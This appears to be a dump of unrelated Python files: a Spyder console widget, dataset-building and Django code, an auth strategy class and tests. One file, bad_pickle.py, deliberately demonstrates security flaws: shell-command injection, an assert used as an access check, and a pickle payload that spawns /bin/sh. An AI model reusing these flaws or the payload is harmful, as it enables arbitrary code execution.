            text=_("Wrap lines"),
            toggled=lambda val: self.set_option('wrap', val),
            initial=self.get_option('wrap'),
        )
        codecompletion_action = self.create_action(
            ConsoleWidgetActions.ToggleCodeCompletion,
            text=_("Automatic code completion"),
            toggled=lambda val: self.set_option('codecompletion/auto', val),
            initial=self.get_option('codecompletion/auto'),
        )
        # Submenu with the internal-console-specific settings.
        internal_settings_menu = self.create_menu(
            ConsoleWidgetMenus.InternalSettings,
            _('Internal console settings'),
        )
        for item in [buffer_action, wrap_action, codecompletion_action,
                     exteditor_action]:
            self.add_item_to_menu(
                item,
                menu=internal_settings_menu,
                section=ConsoleWidgetInternalSettingsSubMenuSections.Main,
            )
        # Options menu: run-related entries first, quit in its own section.
        options_menu = self.get_options_menu()
        for item in [run_action, environ_action, syspath_action,
                     internal_settings_menu]:
            self.add_item_to_menu(
                item,
                menu=options_menu,
                section=ConsoleWidgetOptionsMenuSections.Run,
            )
        self.add_item_to_menu(
            quit_action,
            menu=options_menu,
            section=ConsoleWidgetOptionsMenuSections.Quit,
        )
        # Push the configured external editor path down to the shell.
        self.shell.set_external_editor(
            self.get_option('external_editor/path'), '')
def on_option_update(self, option, value):
if option == 'max_line_count':
self.shell.setMaximumBlockCount(value)
elif option == 'wrap':
self.shell.toggle_wrap_mode(value)
elif option == 'codecompletion/auto':
self.shell.set_codecompletion_auto(value)
elif option == 'external_editor/path':
self.shell.set_external_editor(value, '')
    def update_actions(self):
        """Refresh action state; required by the PluginMainWidget API."""
        # This method is a required part of the PluginMainWidget API. On this
        # widget it is not currently used.
        pass
    def get_focus_widget(self):
        """Return the child widget (the shell) that should receive focus."""
        return self.shell
# --- Qt overrides
# ------------------------------------------------------------------------
def dragEnterEvent(self, event):
"""
Reimplement Qt method.
Inform Qt about the types of data that the widget accepts.
"""
source = event.mimeData()
if source.hasUrls():
if mimedata2url(source):
event.acceptProposedAction()
else:
event.ignore()
elif source.hasText():
event.acceptProposedAction()
def dropEvent(self, event):
"""
Reimplement Qt method.
Unpack dropped data and handle it.
"""
source = event.mimeData()
if source.hasUrls():
pathlist = mimedata2url(source)
self.shell.drop_pathlist(pathlist)
elif source.hasText():
lines = to_text_string(source.text())
self.shell.set_cursor_position('eof')
self.shell.execute_lines(lines)
event.acceptProposedAction()
# --- Public API
# ------------------------------------------------------------------------
    def start_interpreter(self, namespace):
        """
        Start internal console interpreter using *namespace* as its
        global namespace.
        """
        self.shell.start_interpreter(namespace)
    def set_historylog(self, historylog):
        """
        Bind historylog instance to this console.

        Not used anymore since v2.0.
        """
        historylog.add_history(self.shell.history_filename)
        self.shell.append_to_history.connect(historylog.append_to_history)
    def set_help(self, help_plugin):
        """
        Bind help instance to this console so the shell can request
        object documentation from it.
        """
        self.shell.help = help_plugin
@Slot(dict)
def handle_exception(self, error_data, sender=None, internal_plugins=None):
"""
Exception ocurred in the internal console.
Show a QDialog or the internal console to warn the user.
Handle any exception that occurs during Spyder usage.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
sender: spyder.api.plugins.SpyderPluginV2, optional
The sender plugin. Default is None.
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
text = error_data.get("text", None)
is_traceback = error_data.get("is_traceback", False)
title = error_data.get("title", "")
label = error_data.get("label", "")
steps = error_data.get("steps", "")
# Skip errors without traceback (and no text) or dismiss
if ((not text and not is_traceback and self.error_dlg is None)
or self.dismiss_error):
return
if internal_plugins is None:
internal_plugins = find_internal_plugins()
if internal_plugins:
internal_plugin_names = []
for __, val in internal_plugins.items():
name = getattr(val, 'NAME', getattr(val, 'CONF_SECTION'))
internal_plugin_names.append(name)
sender_name = getattr(val, 'NAME', getattr(val, 'CONF_SECTION'))
is_internal_plugin = sender_name in internal_plugin_names
else:
is_internal_plugin = False
repo = "spyder-ide/spyder"
if sender is not None and not is_internal_plugin:
repo = error_data.get("repo", None)
try:
plugin_name = sender.NAME
except Exception:
plugin_name = sender.CONF_SECTION
if repo is None:
raise Exception(
'External plugin "{}" does not define "repo" key in '
'the "error_data" dictionary!'.format(plugin_name)
)
if self.get_option('show_internal_errors'):
if self.error_dlg is None:
self.error_dlg = SpyderErrorDialog(self)
self.error_dlg.set_color_scheme(self.get_option('color_theme'))
self.error_dlg.close_btn.clicked.connect(self.close_error_dlg)
self.error_dlg.rejected.connect(self.remove_error_dlg)
self.error_dlg.details.go_to_error.connect(self.go_to_error)
# Set the report repository
self.error_dlg.set_github_repo_org(repo)
if title:
self.error_dlg.set_title(title)
self.error_dlg.title.setEnabled(False)
if label:
self.error_dlg.main_label.setText(label)
self.error_dlg.submit_btn.setEnabled(True)
if steps:
self.error_dlg.steps_text.setText(steps)
self.error_dlg.set_require_minimum_length(False)
self.error_dlg.append_traceback(text)
self.error_dlg.show()
elif DEV or get_debug_level():
self.change_visibility(True, True)
def close_error_dlg(self):
"""
Close error dialog.
"""
if self.error_dlg.dismiss_box.isChecked():
self.dismiss_error = True
self.error_dlg.reject()
    def remove_error_dlg(self):
        """
        Forget the error dialog (called when it is rejected/closed).
        """
        self.error_dlg = None
    @Slot()
    def show_env(self):
        """
        Show environment variables in a modal dialog.
        """
        self.dialog_manager.show(EnvDialog(parent=self))
    def get_sys_path(self):
        """
        Return the `sys.path`.
        """
        return sys.path
    @Slot()
    def show_syspath(self):
        """
        Show `sys.path` in a read-only collections editor.
        """
        editor = CollectionsEditor(parent=self)
        editor.setup(
            sys.path,
            title="sys.path",
            readonly=True,
            icon=self.create_icon('syspath'),
        )
        self.dialog_manager.show(editor)
    @Slot()
    def run_script(self, filename=None, silent=False, set_focus=False,
                   args=None):
        """
        Run a Python script in the internal console via `runfile`.

        When *filename* is None, an open-file dialog is shown and the
        current directory is changed to the script's folder.
        NOTE(review): `silent` is accepted but never used in this body —
        confirm whether callers rely on it.
        """
        if filename is None:
            # Restore stdio around the native file dialog so it does not
            # print into the redirected console streams.
            self.shell.interpreter.restore_stds()
            filename, _selfilter = getopenfilename(
                self,
                _("Run Python script"),
                getcwd_or_home(),
                _("Python scripts") + " (*.py ; *.pyw ; *.ipy)",
            )
            self.shell.interpreter.redirect_stds()
            if filename:
                # Work from the script's own directory.
                os.chdir(osp.dirname(filename))
                filename = osp.basename(filename)
            else:
                return
        logger.debug("Running script with %s", args)
        filename = osp.abspath(filename)
        rbs = remove_backslashes
        # NOTE(review): when args is None this produces args='None' in the
        # command string — confirm runfile treats that as "no args".
        command = "runfile('%s', args='%s')" % (rbs(filename), rbs(args))
        if set_focus:
            self.shell.setFocus()
        self.change_visibility(True, True)
        self.shell.write(command+'\n')
        self.shell.run_command(command)
def go_to_error(self, text):
"""
Go to error if relevant.
"""
match = get_error_match(to_text_string(text))
if match:
fname, lnb = match.groups()
self.edit_script(fname, int(lnb))
    def edit_script(self, filename=None, goto=-1):
        """
        Open *filename* at line *goto* in the external editor (if set)
        and ask the Editor plugin to open it as well.
        """
        if filename is not None:
            # Called from InternalShell
            self.shell.external_editor(filename, goto)
            self.sig_edit_goto_requested.emit(osp.abspath(filename), goto, '')
    def execute_lines(self, lines):
        """
        Execute lines and give focus to shell.
        """
        self.shell.execute_lines(to_text_string(lines))
        self.shell.setFocus()
    @Slot()
    def change_max_line_count(self, value=None):
        """
        Change the maximum line count kept in the console buffer.

        When *value* is None, prompt the user with an integer dialog
        (0..1000000, pre-filled with the current setting).
        """
        valid = True
        if value is None:
            value, valid = QInputDialog.getInt(
                self,
                _('Buffer'),
                _('Maximum line count'),
                self.get_option('max_line_count'),
                0,
                1000000,
            )
        if valid:
            self.set_option('max_line_count', value)
@Slot()
def change_exteditor(self, path=None):
"""
Change external editor path.
"""
valid = True
if path is None:
path, valid = QInputDialog.getText(
self,
_('External editor'),
_('External editor executable path:'),
QLineEdit.Normal,
self.get_option('external_editor/path'),
)
if valid:
self.set_option('external_editor/path', to_text_string(path))
    def set_exit_function(self, func):
        """
        Set the callback function to execute when the `exit_interpreter` is
        called.
        """
        self.shell.exitfunc = func
    def set_font(self, font):
        """
        Set font of the internal shell.
        """
        self.shell.set_font(font)
    def redirect_stds(self):
        """
        Redirect stdout and stderr when using open file dialogs.
        """
        self.shell.interpreter.redirect_stds()
    def restore_stds(self):
        """
        Restore stdout and stderr when using open file dialogs.
        """
        self.shell.interpreter.restore_stds()
    def set_namespace_item(self, name, item):
        """
        Add an object to the namespace dictionary of the internal console.
        """
        self.shell.interpreter.namespace[name] = item
    def exit_interpreter(self):
        """
        Exit the internal console interpreter.

        This is equivalent to requesting the main application to quit.
        """
        self.shell.exit_interpreter()
d9eb5a7787db50d7b723bf2048c4ae363ea8ac25 | 6,206 | py | Python | utils/create_dataset_multiplechoice.py | nlpunibo/Qustion-Answering-Squad-extension | 59f8c3a7965212dd01e21e1bc907a3b805e34aff | [
"MIT"
] | null | null | null | utils/create_dataset_multiplechoice.py | nlpunibo/Qustion-Answering-Squad-extension | 59f8c3a7965212dd01e21e1bc907a3b805e34aff | [
"MIT"
] | null | null | null | utils/create_dataset_multiplechoice.py | nlpunibo/Qustion-Answering-Squad-extension | 59f8c3a7965212dd01e21e1bc907a3b805e34aff | [
"MIT"
] | null | null | null | import argparse
import pandas as pd
from utils.utils import *
from models.models import *
from pathlib import Path
from datasets import load_dataset
from tqdm import tqdm
from transformers import AutoTokenizer, TrainingArguments, Trainer
def main():
    """Build a multiple-choice SQuAD-style dataset.

    Runs our fine-tuned DistilBERT QA model over the input json file, keeps
    its top predicted answer spans as distractors, guarantees the gold
    answer is among the five options, shuffles them and writes
    ``dataset_multiple_choice.csv`` next to the input file.
    """
    parser = argparse.ArgumentParser(description='Argument parser')
    parser.add_argument("path_to_json_file", help="Path to the json file", type=str)
    cli_args = parser.parse_args()
    # Set the seed for reproducibility
    fix_random(seed=42)
    # Load the data twice: as a `datasets.Dataset` (model input) and as a
    # flat DataFrame (for building the csv).
    data_path = Path(cli_args.path_to_json_file).parent
    train_data = load_dataset('json', data_files=cli_args.path_to_json_file, field='data')
    train_dataframe = pd.json_normalize(get_json_data(cli_args.path_to_json_file), record_path='data', sep='_')
    train_dataframe["answers_text"] = train_dataframe["answers_text"].apply(get_text)
    # Tokenizer matching the best-performing DistilBertForQuestionAnswering
    # checkpoint we uploaded to the HuggingFace Hub; AutoTokenizer downloads
    # the vocabulary used when pretraining this specific checkpoint.
    model_checkpoint = "nlpunibo/distilbert_config3"
    tokenizer = AutoTokenizer.from_pretrained(model_checkpoint)
    # The maximum length of a feature (question and context)
    max_length = 384
    # The authorized overlap between two parts of the context when splitting
    # it is needed.
    doc_stride = 128
    # Our model expects padding on the right
    pad_on_right = True
    squad = SQUAD(tokenizer, pad_on_right, max_length, doc_stride)
    # Pretrained QA model; moved to the GPU when one is available.
    model = DistilBertForQuestionAnswering.from_pretrained(model_checkpoint)
    if torch.cuda.is_available():
        model.cuda()
    # A bare Trainer is only used as a convenient batched-predict loop.
    # (Renamed from `args`, which shadowed the parsed CLI arguments above.)
    training_args = TrainingArguments(
        output_dir='../src/results',
        label_names=["start_positions", "end_positions"]
    )
    trainer = Trainer(model, training_args)
    # prepare_validation_features keeps the example id and the offset
    # mapping so predicted token spans can be mapped back to character
    # positions in the context.
    print("Preparing the test data:")
    train_features = train_data['train'].map(squad.prepare_validation_features, batched=True,
                                             remove_columns=train_data['train'].column_names)
    # Get final predictions
    with torch.no_grad():
        pred = trainer.predict(train_features)
    # The Trainer hides the columns the model does not use (example_id and
    # offset_mapping, needed for post-processing), so we set them back.
    train_features.set_format(type=train_features.format["type"],
                              columns=list(train_features.features.keys()))
    # Map raw start/end logits to answer strings: one candidate list per id.
    final_predictions = squad.postprocess_qa_predictions(train_data['train'], train_features, pred.predictions)
    formatted_predictions = dict(final_predictions)
    # Create the dataset
    dataset_multiple_choice = pd.DataFrame.copy(train_dataframe)
    # New columns for the five answers and the label (index of the correct
    # one). Cells are written with DataFrame.iat — the original chained
    # assignment `df[col].iloc[i] = ...` is not guaranteed to write through
    # to the frame.
    answer_columns = ('answer1', 'answer2', 'answer3', 'answer4', 'answer5')
    for column in answer_columns + ('label',):
        dataset_multiple_choice[column] = ''
    column_pos = {column: dataset_multiple_choice.columns.get_loc(column)
                  for column in answer_columns + ('label',)}
    # NOTE(review): rows are assumed aligned 1:1 and in order with the keys
    # of `formatted_predictions`, as in the original implementation.
    for i, example_id in enumerate(tqdm(formatted_predictions.keys())):
        gold_answer = dataset_multiple_choice.answers_text.iloc[i]
        candidates = formatted_predictions[example_id]
        if gold_answer not in candidates:
            # Drop the weakest distractor and put the gold answer in.
            candidates = candidates[:-1]
            candidates.insert(0, gold_answer)
        # Shuffle the answers, then pad to exactly five options.
        random.shuffle(candidates)
        candidates = candidates + ['[PAD]'] * (5 - len(candidates))
        formatted_predictions[example_id] = candidates
        for slot, column in enumerate(answer_columns):
            dataset_multiple_choice.iat[i, column_pos[column]] = candidates[slot]
        dataset_multiple_choice.iat[i, column_pos['label']] = candidates.index(gold_answer)
    # BUG FIX: the original path expression `data_path / + "..."` applied
    # unary `+` to a str and raised TypeError before anything was written.
    dataset_multiple_choice.to_csv(str(data_path / "dataset_multiple_choice.csv"), encoding='utf-8')
if __name__ == '__main__':
    main()
| 48.484375 | 168 | 0.711247 |
af4ba4e220dfe67301bb7f9bc65c8c2c3383ca27 | 1,610 | py | Python | baccoapp/mysandwich/migrations/0001_initial.py | msienkiewicz7/baccoapp | d647ca205fdf06fe57fda7b6db164ae7d3387dad | [
"MIT"
] | null | null | null | baccoapp/mysandwich/migrations/0001_initial.py | msienkiewicz7/baccoapp | d647ca205fdf06fe57fda7b6db164ae7d3387dad | [
"MIT"
] | null | null | null | baccoapp/mysandwich/migrations/0001_initial.py | msienkiewicz7/baccoapp | d647ca205fdf06fe57fda7b6db164ae7d3387dad | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2019-06-14 16:27
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration for the `mysandwich` app: creates the
    # Ingredient and Sandwich tables. Do not hand-edit field definitions —
    # generate a follow-up migration instead.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Ingredient',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('full_name', models.CharField(max_length=255)),
                # NOTE(review): 'Contiment' looks like a typo for 'Condiment';
                # it is a stored display label, so fixing it needs a new migration.
                ('type', models.CharField(choices=[('BREAD', 'Bread'), ('BASE', 'Base'), ('CHEESE', 'Cheese'), ('VEGETABLE', 'Vegetable'), ('CONDIMENT', 'Contiment'), ('EXTRAS', 'Extras')], max_length=50)),
                ('calories', models.IntegerField(default=0)),
                ('is_vegetarian', models.BooleanField()),
                ('is_vegan', models.BooleanField()),
                ('img', models.FileField(upload_to='ingredients')),
                ('price', models.DecimalField(decimal_places=2, max_digits=3)),
            ],
        ),
        migrations.CreateModel(
            name='Sandwich',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('pub_date', models.DateTimeField(verbose_name='date created')),
                ('price', models.DecimalField(decimal_places=2, max_digits=4)),
                ('ingredients', models.ManyToManyField(to='mysandwich.Ingredient')),
            ],
        ),
    ]
3a2dde16596b04d583cb14b7058dc6d93c63a429 | 305 | py | Python | tasks/read_csv_file.py | Adamage/python-training | dd58868420656dc575c4a32304028bdd0215f415 | [
"Apache-2.0"
] | 2 | 2018-09-06T15:29:25.000Z | 2019-09-18T08:59:24.000Z | tasks/read_csv_file.py | Adamage/python-training | dd58868420656dc575c4a32304028bdd0215f415 | [
"Apache-2.0"
] | 1 | 2017-09-13T17:31:43.000Z | 2021-03-15T14:59:50.000Z | tasks/read_csv_file.py | Adamage/python-training | dd58868420656dc575c4a32304028bdd0215f415 | [
"Apache-2.0"
] | null | null | null | with open('example.csv') as file:
headers = file.readline().replace("\n","").split(",")
data = []
for line in file:
data.append(line.replace("\n","").split(","))
for record in data:
record_dictionary = {k:v for k,v in zip(headers,record)}
print(record_dictionary)
| 30.5 | 64 | 0.586885 |
6a3701a4568bf0c34cdbda146f2705b8611c34e3 | 775 | py | Python | vtp/admin.py | CzechInvest/ciis | c6102598f564a717472e5e31e7eb894bba2c8104 | [
"MIT"
] | 1 | 2019-05-26T22:24:01.000Z | 2019-05-26T22:24:01.000Z | vtp/admin.py | CzechInvest/ciis | c6102598f564a717472e5e31e7eb894bba2c8104 | [
"MIT"
] | 6 | 2019-01-22T14:53:43.000Z | 2020-09-22T16:20:28.000Z | vtp/admin.py | CzechInvest/ciis | c6102598f564a717472e5e31e7eb894bba2c8104 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import VtpType, Service, Vtp
from leaflet.admin import LeafletGeoAdmin, LeafletGeoAdminMixin
from cigeo.admin import ArealFieldAdmin
class VtpAdmin(ArealFieldAdmin, LeafletGeoAdmin):
    """Admin configuration for Vtp objects with a map-based change list."""

    list_display = (
        "name", "my_type", "my_services", "url")
    change_list_template = "admin/change_list-map.html"
    raw_id_fields = ("address",)
    default_zoom = 7
    default_lon = 1730000
    default_lat = 6430000

    def my_type(self, obj):
        """Comma-separated names of the object's related types (list column)."""
        related = obj.type.all()
        return ", ".join(str(entry) for entry in related)

    def my_services(self, obj):
        """Comma-separated names of the object's services (list column)."""
        related = obj.services.all()
        return ", ".join(str(entry) for entry in related)
# Register the models with the admin site; Vtp uses the customised
# map-based VtpAdmin, the others use the default ModelAdmin.
admin.site.register(VtpType)
admin.site.register(Service)
admin.site.register(Vtp, VtpAdmin)
| 28.703704 | 63 | 0.703226 |
76496ba1d10857a138c998d2c7770c8581d3cfc1 | 680 | py | Python | bad_pickle.py | ProjectG77/pv080_test_py | 93a5cb6da555fe5e3fcc82e251b3000a72ac5295 | [
"MIT"
] | null | null | null | bad_pickle.py | ProjectG77/pv080_test_py | 93a5cb6da555fe5e3fcc82e251b3000a72ac5295 | [
"MIT"
] | null | null | null | bad_pickle.py | ProjectG77/pv080_test_py | 93a5cb6da555fe5e3fcc82e251b3000a72ac5295 | [
"MIT"
] | null | null | null | # contains bunch of buggy examples
# taken from https://hackernoon.com/10-common-security-gotchas-in-python-and-how-to-avoid-them-e19fbe265e03
import cPickle
import subprocess
import base64
import subprocess
# Input injection
def transcode_file(request, filename):
    # SECURITY (intentional demo): `filename` is interpolated straight into a
    # shell command line and run with shell=True, so a crafted filename can
    # execute arbitrary shell commands (command injection).
    command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
    subprocess.call(command, shell=True)  # a bad idea!
# Assert statements
def foo(request, user):
    # SECURITY (intentional demo): `assert` statements are stripped when
    # Python runs with -O, so this access-control check silently disappears
    # in optimized mode; real code must raise an exception instead.
    assert user.is_admin, 'user does not have access'
    # secure code...
# Pickles
class RunBinSh(object):
    # SECURITY (intentional demo): a malicious pickle payload. Unpickling an
    # instance of this class invokes subprocess.Popen('/bin/sh') because
    # pickle calls __reduce__ to reconstruct the object.
    def __reduce__(self):
        return (subprocess.Popen, (('/bin/sh',),))

# Prints a base64-encoded pickle that spawns a shell when loaded with
# cPickle.loads - never unpickle untrusted data.
print(base64.b64encode(cPickle.dumps(RunBinSh())))
| 23.448276 | 107 | 0.736765 |
4eab20a8be939ab1a4bc146e735f583eb03cde18 | 1,523 | py | Python | src/robotide/lib/robot/utils/compress.py | veryl-technologies/t24-tests-ide | 16cd803895916a785c0e1fec3f71f9388c21edc9 | [
"ECL-2.0",
"Apache-2.0"
] | 8 | 2015-09-10T07:45:58.000Z | 2020-04-13T06:25:06.000Z | src/robotide/lib/robot/utils/compress.py | veryl-technologies/t24-tests-ide | 16cd803895916a785c0e1fec3f71f9388c21edc9 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-08-03T10:01:06.000Z | 2020-08-03T10:01:06.000Z | src/robotide/lib/robot/utils/compress.py | veryl-technologies/t24-tests-ide | 16cd803895916a785c0e1fec3f71f9388c21edc9 | [
"ECL-2.0",
"Apache-2.0"
] | 10 | 2015-10-06T13:29:50.000Z | 2021-05-31T01:04:01.000Z | # Copyright 2008-2012 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import sys
def compress_text(text):
    """Compress *text* (zlib/deflate, level 9) and return it base64-encoded."""
    raw = text.encode('UTF-8')
    return base64.b64encode(_compress(raw))


if sys.platform.startswith('java'):
    # Custom compress implementation needed to avoid memory leak:
    # http://bugs.jython.org/issue1775
    # This is based on the zlib.compress in Jython 2.5.2 but has a memory
    # leak fix and is also a little faster.
    from java.util.zip import Deflater
    import jarray

    _DEFLATOR = Deflater(9, False)

    def _compress(data):
        """Deflate *data* with the shared Deflater, 1 KB chunk at a time."""
        _DEFLATOR.setInput(data)
        _DEFLATOR.finish()
        chunk = jarray.zeros(1024, 'b')
        pieces = []
        while not _DEFLATOR.finished():
            count = _DEFLATOR.deflate(chunk, 0, 1024)
            pieces.append(chunk[:count].tostring())
        # Reset so the module-level Deflater can be reused by the next call.
        _DEFLATOR.reset()
        return ''.join(pieces)
else:
    import zlib

    def _compress(data):
        """Deflate *data* at maximum compression level using CPython's zlib."""
        return zlib.compress(data, 9)
2ddd03343c4cc5c7a0c7e14970fbf03cd3fd21b9 | 914 | py | Python | catalog/reference_book/urls.py | Imbafar/catalog | f4d77f55ad2608ffda518a8b9c8edb82ea3f1c96 | [
"BSD-3-Clause"
] | null | null | null | catalog/reference_book/urls.py | Imbafar/catalog | f4d77f55ad2608ffda518a8b9c8edb82ea3f1c96 | [
"BSD-3-Clause"
] | null | null | null | catalog/reference_book/urls.py | Imbafar/catalog | f4d77f55ad2608ffda518a8b9c8edb82ea3f1c96 | [
"BSD-3-Clause"
] | null | null | null | from django.urls import path
from . import views
app_name = "reference_book"
urlpatterns = [
path(
"",
views.index,
name="index",
),
path(
"reference_book/<int:reference_book_id>/",
views.reference_book_detail,
name="reference_book_detail",
),
path(
"create_reference/",
views.reference_book_create,
name="reference_book_create",
),
path(
"element/<int:element_id>/",
views.element_detail,
name="element_detail",
),
path(
"reference_book/<int:reference_book_id>/edit/",
views.reference_book_edit,
name="reference_book_edit",
),
path(
"element/<int:element_id>/edit/",
views.element_edit,
name="element_edit",
),
path(
"create_element/",
views.element_create,
name="element_create",
),
]
| 20.772727 | 55 | 0.570022 |
fa16e7878927ec2815695c5e46729a04a4c66676 | 1,597 | py | Python | customs/strategies/base_strategy.py | gijswobben/customs | 72c0d071fe35ed84eb6d6371eb651edcd13a1044 | [
"MIT"
] | null | null | null | customs/strategies/base_strategy.py | gijswobben/customs | 72c0d071fe35ed84eb6d6371eb651edcd13a1044 | [
"MIT"
] | null | null | null | customs/strategies/base_strategy.py | gijswobben/customs | 72c0d071fe35ed84eb6d6371eb651edcd13a1044 | [
"MIT"
] | null | null | null | import warnings
from abc import ABC, abstractmethod
from typing import Any, Dict, Optional, Union
from flask.app import Flask
from flask import Request as FlaskRequest
from werkzeug.wrappers import Request
class BaseStrategy(ABC):
    """Abstract base class for authentication strategies.

    Instantiating a concrete strategy registers it (by ``name``) with the
    ``Customs`` singleton, if one has already been created.
    """

    def __init__(
        self,
    ) -> None:

        # Register this strategy as an available strategy for Customs.
        # Local import -- presumably to avoid a circular import with
        # customs.customs; confirm before moving it to module level.
        from customs.customs import Customs

        self._customs: Optional[Customs] = Customs.get_instance()
        if self._customs is not None:
            self._customs.register_strategy(self.name, self)
        else:
            # No Customs instance exists yet; the strategy stays unregistered.
            warnings.warn(
                "Unable to register strategy, make sure to initialize Customs first!"
            )

    @property  # type: ignore
    @abstractmethod
    def name(self) -> str:
        """Unique name under which this strategy is registered."""
        ...  # pragma: no cover

    @name.setter  # type: ignore
    @abstractmethod
    def name(self, new_name: str):
        ...  # pragma: no cover

    @abstractmethod
    def extract_credentials(
        self, request: Union[Request, FlaskRequest]
    ) -> Dict[str, str]:
        """Extract the raw credentials for this scheme from the request."""
        ...  # pragma: no cover

    @abstractmethod
    def authenticate(self, request: Union[Request, FlaskRequest]) -> Any:
        """ Method should return the user info """
        ...  # pragma: no cover

    @abstractmethod
    def get_or_create_user(self, user: Dict) -> Dict:
        """Return the application's user record for ``user``, creating it if needed."""
        ...  # pragma: no cover

    def serialize_user(self, user: Any) -> Dict:
        # Default implementation: identity; override when the user object
        # is not already dict-like.
        return user

    def deserialize_user(self, data: Dict) -> Any:
        # Default implementation: identity; inverse of serialize_user.
        return data

    def register_additional_routes(self, app: Flask) -> None:
        # Hook for strategies that need extra Flask routes; default is none.
        ...
7bb749fdc67863b5fae622015c53444b74fa3ef0 | 599 | py | Python | azure_ad_auth/__init__.py | wintercircle/django-azure-ad-auth | 14fb385fa73695e0d54b8bdc70b8afa37c614821 | [
"BSD-3-Clause"
] | null | null | null | azure_ad_auth/__init__.py | wintercircle/django-azure-ad-auth | 14fb385fa73695e0d54b8bdc70b8afa37c614821 | [
"BSD-3-Clause"
] | null | null | null | azure_ad_auth/__init__.py | wintercircle/django-azure-ad-auth | 14fb385fa73695e0d54b8bdc70b8afa37c614821 | [
"BSD-3-Clause"
] | null | null | null | __version_info__ = {
'major': 1,
'minor': 5,
'micro': 4,
'releaselevel': 'final',
'serial': 11
}
def get_version(short=False):
assert __version_info__['releaselevel'] in ('alpha', 'beta', 'final')
vers = ["%(major)i.%(minor)i" % __version_info__, ]
if __version_info__['micro']:
vers.append(".%(micro)i" % __version_info__)
if __version_info__['releaselevel'] != 'final' and not short:
vers.append('%s%i' % (__version_info__['releaselevel'][0], __version_info__['serial']))
return ''.join(vers)
__version__ = get_version()
| 31.526316 | 96 | 0.609349 |
b350f4c44732fb45f52192fd4ec2635b94ad1fcc | 2,517 | py | Python | tests/testing/theory/test_legaldrinking.py | AndrewQuijano/w4156-lecture-code | fcd2ae27c80cc40dc156b9ca42966fb11073fda8 | [
"Apache-2.0"
] | 5 | 2018-01-25T06:15:24.000Z | 2018-05-19T17:14:18.000Z | tests/testing/theory/test_legaldrinking.py | AndrewQuijano/w4156-lecture-code | fcd2ae27c80cc40dc156b9ca42966fb11073fda8 | [
"Apache-2.0"
] | 1 | 2018-02-06T04:34:11.000Z | 2018-02-06T04:34:11.000Z | tests/testing/theory/test_legaldrinking.py | AndrewQuijano/w4156-lecture-code | fcd2ae27c80cc40dc156b9ca42966fb11073fda8 | [
"Apache-2.0"
] | 51 | 2018-02-04T00:19:35.000Z | 2018-03-06T20:52:23.000Z | import unittest
from lectures.testing.theory.nationality import Nationality
from lectures.testing.theory.legal_drinking_0bug import LegalToDrinkCalculatorBugFreeIHope
from lectures.testing.theory.legal_drinking_1bug import LegalToDrinkCalculatorWithOneBug
from lectures.testing.theory.legal_drinking_2bug import LegalToDrinkCalculatorWithTwoBugs
from typing import Tuple
import tests.helper as helper
class Test100StatementCoverageTwoBugs(unittest.TestCase):
    # Teaching example: one test reaches 100% statement coverage on the
    # two-bug calculator, yet the second (intentionally failing, skipped)
    # test shows a bug survives.
    def test_legal_drinking(self):
        """
        This one test case shows how we can generate 100% statement coverage but still have a bug
        """
        self.assertTrue(LegalToDrinkCalculatorWithTwoBugs.is_legal(21, Nationality.American))

    @helper.skip_intentionally_failing()
    def test_should_be_illegal_drinking(self):
        """
        This second test case here exposes there was still a bug. Remember - the single test case above generated 100%
        statement coverage
        """
        self.assertFalse(LegalToDrinkCalculatorWithTwoBugs.is_legal(8, Nationality.American))
class Test100BranchCoverageOneBug(unittest.TestCase):
    # Teaching example: the first two tests reach 100% branch coverage on the
    # one-bug calculator, yet the third (intentionally failing, skipped) test
    # shows a bug survives.
    def test_legal(self):
        self.assertTrue(LegalToDrinkCalculatorWithOneBug.is_legal(21, Nationality.American))

    def test_illegal(self):
        """
        We fix the code and add this test cases now fails
        """
        self.assertFalse(LegalToDrinkCalculatorWithOneBug.is_legal(8, Nationality.American))

    @helper.skip_intentionally_failing()
    def test_illegal_british(self):
        """
        The above two test cases hit 100% branch coverage. However, there is still a bug.
        This test cases exposes the bug
        """
        self.assertFalse(LegalToDrinkCalculatorWithOneBug.is_legal(17, Nationality.British))
class TestConditionCoverageNoBugs(unittest.TestCase):
    """Teaching example: cases chosen to reach multiple-condition coverage."""

    def push_assert(self, tple: Tuple):
        """Assert is_legal(age, nationality) equals the expected flag for one case."""
        legal = LegalToDrinkCalculatorBugFreeIHope.is_legal(tple[0], tple[1])
        self.assertTrue(legal == tple[2])

    def test_legal_drinking(self):
        cases = [(21, Nationality.American, True),  # hits statement coverage
                 (20, Nationality.American, False),  # hits branch coverage
                 (18, Nationality.British, True),  # hits condition coverage (evaluated to false previously)
                 (17, Nationality.British, False),  # (multiple condition coverage)
                 ]
        # Plain loop instead of list(map(lambda ...)): we iterate only for the
        # assertion side effect, so building a throwaway list (and re-packing
        # each tuple through a lambda) was wasteful.
        for case in cases:
            self.push_assert(case)


if __name__ == '__main__':
    unittest.main()
| 38.723077 | 118 | 0.716329 |
8f905d66f331b920b938dc83d5109a4bcc9fa86d | 620 | py | Python | setup.py | choki0715/lecture | 2904b20387925c7f33db9ecd85fc71adf2750f3d | [
"MIT"
